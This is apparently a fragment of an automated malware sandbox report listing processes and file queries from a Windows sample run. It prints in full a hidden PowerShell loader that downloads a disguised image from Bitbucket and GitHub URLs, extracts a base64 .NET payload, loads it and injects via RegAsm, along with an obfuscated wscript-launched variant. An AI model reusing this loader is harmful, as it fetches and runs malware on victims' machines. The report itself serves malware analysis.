I##N##o#I##g#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#gs#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#gs#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A12EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF6975A12EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
